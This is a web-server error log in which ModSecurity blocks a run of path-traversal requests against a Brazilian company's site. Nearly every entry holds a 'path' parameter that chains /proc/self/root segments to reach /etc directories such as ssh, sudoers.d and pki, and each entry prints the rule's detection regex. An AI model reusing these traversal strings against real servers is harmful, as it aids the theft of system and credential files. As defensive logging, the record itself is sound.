[Mon Mar 16 14:01:58.995226 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.243.203:37804] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3hf9ocpUE4ed4uDz2WQAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:00.359520 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.243.203:57176] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3iJqj1wV0Si-Okef1_wAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:05.024486 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.243.203:57180] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3jZqj1wV0Si-Okef2AwAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:06.149339 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.228.16:57358] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abg3jtSswJuvopo3lOhlxAAAAIc"]
[Mon Mar 16 14:02:06.260188 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.243.203:57182] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3jtSswJuvopo3lOhlxQAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:07.639448 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.243.203:57188] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3j5qj1wV0Si-Okef2BgAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:08.935478 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.243.203:57196] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3kHjZBu2q05ozVU9gHgAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:10.345142 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.243.203:53062] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3knjZBu2q05ozVU9gIAAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:11.684553 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.243.203:53078] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3k3jZBu2q05ozVU9gIgAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:13.059511 2026] [:error] [pid 15568:tid 140411691570944] [client 74.7.243.203:53092] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3laQpVkWug9HeOt88YgAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:14.261935 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.243.203:53102] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3lv9ocpUE4ed4uDz2WwAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:15.564890 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.243.203:53106] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3l9SswJuvopo3lOhlxwAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:16.747530 2026] [:error] [pid 15061:tid 140411674785536] [client 74.7.243.203:53122] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3mKTCbgAP5jq5Tegx5gAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:19.244930 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.243.203:53138] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3m7ABkC4fWIHEf8H1jAAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:20.587306 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:46722] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3nP9ocpUE4ed4uDz2XQAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:24.304359 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.243.203:46728] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3oLABkC4fWIHEf8H1kgAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:29.131477 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.243.203:46740] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3pf9ocpUE4ed4uDz2ZAAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:30.475382 2026] [:error] [pid 14895:tid 140411565680384] [client 74.7.243.203:56566] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3plajLEzk2WiQ-10ZPQAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:31.865093 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.243.203:56572] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3p6QpVkWug9HeOt88cQAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:42.883963 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.243.203:56586] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3sv9ocpUE4ed4uDz2bwAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:45.329511 2026] [:error] [pid 10651:tid 140411674785536] [client 74.7.243.203:34008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3tbysWC90G-1nBrBL7AAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:55.566064 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.243.203:34018] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3v6TCbgAP5jq5TegyEwAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:02:59.225879 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.243.203:55658] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3w3jZBu2q05ozVU9gKgAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
